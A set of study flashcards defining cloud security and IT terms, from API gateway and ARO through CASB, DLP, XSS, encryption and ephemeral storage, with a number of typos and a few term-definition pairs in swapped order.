AIO Glossary Flashcards
A tool that sites between client systems and the back end services they call via API rwquests in order to serve as a reverse proxy for security and performance capabilities
API Gateway
A set of functions, routines, tools or protocols for building applications. An API allows for interaction between systems and applications that can be leveeraged by developers as building blocks for their applications and data access through a common method, without custom coding for each integration
Application Programming Interface (API)
An estimated number of the times a threat will successfully exploit a given vulnerability over the couse of a single year
Annualized Rate of Occurrence (ARO)
A threat modeling approach composed of Architecture, Threats, Attack Surfaces and Mitigations
ATASM
The ability to properly capture, analyze and report on any and all events that happen within a system or application, such as data access and modification, user actions and processes, controls and compliance and regulatory and contractual compliance
Auditability
The process of evaluating credentials presented by a user, application or service to prove its identity as compared to values already known and verified by the authentication system
Authentication
The process of granting or denying access to a system, network or application after successful authentication has been performed, based on approved criteria set by regulation
Authorization
Part of the change management process, which establishes an agreed upon standard configuration and the attributes that comprise it and forms the basis for managing change from that point forward
Baseline
A heavily fortified system that serves as a jumpbox or proxy between an untrsuted network and trusted networks
Bastion Host
The capability of an organization to continue the operation of systems or applications at a predetermined level after an incident or a disruption of service
Business Continuity
A process designed to identify risks, threats and vulnerabilities that could disrupt or impact services, with the intent of determining mitigation stratgies and response processes should they occur
Business Continuity Management
A developed and tested document, containing information from stakeholders and staff, for the continuation of operations and services in the event of a disruption or incident
Business Continuity Plan
A structured methodology to identify and evaluate the possible risks and threats that operations or services could be impacted by, as well as the possible or liklely extent of impact and disruption
Business Impact Analysis
The formal documentiation showing the chronological control and disposition of data or evidence, either physical or electronic. This documentation includes creation, all changes of possession and final disposition.
Chain of Custody
Federation
A group of IT service providers that interoperate based on an agreed upon set of standards and operations
An individual with a role in the change management process who ensures the overall change process is properly executed. This person also directly handles low levels tasks related to the change process
Change Manage
A software tool or service that sits between cloud resources and the clients or systems accessing them. It serves as a gateway that can perform a variety of security and policy enforcement functions. A CASB typically can consolidate and perform the functions of firewalls and web applications firewalls as well as provide authentication and data loss prevention capabilities
Cloud Access Security Broker
An application that is never installed on a local server or desktop but is instead accessed via a network or the Internet. A cloud application merges the functionalty of a local application with the accessibility of a web based application
Cloud Application
Cloud Application Management for Platforms (CAMP)
Within a PaaS implementation, CAMP servers as the framework and specification for managing platform services, encompassing a RESTful protocol for managing services, the model for describing and documenting the components that comprise the platform, and the language describing the overall platform, its components and services and the metadata about it
An audit that is specifically responsible for conducting audits of cloud systems and cloud applications. The cloud auditor is responsible for assessing the effectiveness of cloud service and identifying control deficiencies between the cloud customer and the cloud provider, as well as the cloud broker if one is used
Cloud Auditor
The process of using a cloud based backup system, with files and data being sent over the network to a public or private cloud provider for backup, rather than running traditional backup systems within a data center
Cloud backup
A public or private cloud services organization that offers backup services to either the public or organizational clients, either on a free basis or using various costing models based on either the amount of data or number of systems
Cloud Backup Service Provider
Services that run within a public or private cloud offering backup solutions, either through client based software that does automatic or scheduled backups or through manual backups initiated by a user or system
Cloud Backup Solutions
An organization that sells and offers cloud services, and possibly cloud support services, to various organizations and works as a middleman between the cloud customer and cloud provider
Cloud Computing Reseller
A formally published guide by the Cloud Security Alliance that enables cloud customers to evaluate a prospective cloud provider in regard to its security posture, The CCM also allows a cloud provider to structure its security approach
Cloud Controls Matrix (CCM)
An organization or individual that utilzies and consumes resources and services from a cloud provider. This can be in the form of free public services and systems or private and gee based applications or solutions
Cloud Customer
The ability to move data between cloud providers
Cloud Data Portability
A database that is installed in a cloud environment and accessed via the network or the Internet by a user or application. Because the database is being installed in a cloud environment instead of a typical server environment, elasticity, scalability and high availability can be achieved and maximized
Cloud Database
A partner that serves as an intermediary between a cloud service customer and a cloud service provider
Cloud Service Broker
A group of cloud services with a common set of features or qualities
Cloud Service Categoriy
On that holds a relation with either a cloud service provider or a cloud service customer to assist with cloud services and their delivery
Cloud Service Partner
Common Criteria
A set of international guidelines and specifications for the evaluation of IT security resources to ensure that they meet an agreed upon set of security standards, specifically focused on government computing and security needs and requirements. The Common Criteria for Information Technology Security Evaluation is formalized as an international standard in ISO/IEC 15408
A cloud infrastructure provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns. It may be owned, managed and operated by one or more of the organizations in the community, a third party or some combination of these and it may exist on or off premises
Community Cloud
CaaS allows for the execution of compute intensive workloads to be performed in the cloud. Code can be executed in a serverless environment where the customer only pays for the computing time and cycles they consume, without the need for setting up server instances or environments.
Compute as a Service (CaaS)
Confidential computing is a paradigm that isolates the processing of data within protected CPU segments that are completely isolated from other users and systems
Confidential Computing
Establishing a controlled means of consistency throughout a systems lifecycle, based on its requirements and technical specifications, to properly ensure configuration controls, performance standards and design requirements
Configuration Management
A software package that contains all of the code, configuration, and libraries needed for an application to operate, packaged inside a single unit
Container
The process of taking logs from many different systems and putting them together based on a commonality in order to fully track a session or transaction
Correlation
A very common type of security vulnerability found with web applications, where an attacker can inject client side scripts into web pages that are then viewed and executed by other users.; The goal of XSS from an attackers perspective is to bypass the security controls of an application, such as an access control with a same origin policy
Cross Site Scripting
Data that resides on a system in persistent storage, such as disks, tapes, databases or any other type of storage device
Data at Rest (DAR)
The feature of cloud storage where data is spread across data centers or wide geographic areas for redundancy and speed. The degree of dispersion is typically based on the needs of the application and the level of service provured by the cloud customer
Data Dispersion
Serverless, managed data processing service offered by a cloud provider for the execution of data pipelines
Data Flow
Data that flows over a networked connection, either through public unsecured networks or internal protected corporate networks
Data in Transit
Data within a system or application that is currently being processed or is in use, either through the computing resources or residing in memory
Data in Use
An overall strategy and process for ensuring that users cannot send sensitive or protected information outside of network or systems that are secured and protected. This can be related to the intentional attempt by user to transfer such information, but it also applies to preventing the accidental sending or leakage of data
Data Loss Prevention
The ability to easily move data from one system to another without having to re-enter it
Data Portability
A suite of tools used to monitor database operations and functions in real time in order to detect security concerns or anomalies
Database Activity Monitoring (DAM)
A subscription service where the database is installed, configured, secured and maintained by the cloud provider, the the cloud customer on responsible for loading their schema and data
Database as a Service (DBaaS)
A cloud based equivalent of a traditional virtual desktop interface (VDI) that is hosted and managed by a cloud provider rather than on hardware owned by the customer
Desktop as a Service (DaaS)
Combines software development with IT operations, with a goal of shortening the software development time and providing optimal uptime and quality of service
DevOps
Short for development, security and operations. The process of integrating security at all levels and stages of development and operations to fully ensure best practices and a focus on security
DevSecOps
Information that specifically applies to a unique individual such as name, address, phone number, email address, or unique identifying numbers of codes
Direct Identifier
A utility from VMware that balances computing demands and available resources within the virtualized environment
Distributed Resource Scheduler (DRS)
The testing of an application while it is in an operational state with currently running systems, applications and networks
Dynamic Application Security Testing (DAST)
The process of moving and reallocating virtual machines and resources within a cluster environment to maintain optimal performance with balanced and distributed resource utilization
Dynamic Optimization
A computing paradigm that is based on putting the processing of data and computing resources as close to the source of that data as possible
Edge Computing
The process for a criminal or civil legal case where electronic data is determined, located and secured to be used as evidence
eDiscovery
The process of encoding and securing data so that only authorized parties in possession of the correct information, credentials or keys can access it
Encryption
An application that runs on a large and distributed scale and is deemed mission critical to a company or organization
Enterprise Application
A cloud based backup and recovery service that is related to and similar to those offered for personal use, but scaled and focsed on large scale and organizational level services
Enterprise Cloud Backup
Temporary, unstructured storage that is only used for a node or service while it is active and in use and the is destroyed upon being shut down or deleted
Ephemeral Storage
An action or situation that is recognized by software that then causes some action or response by the software to be taken
Event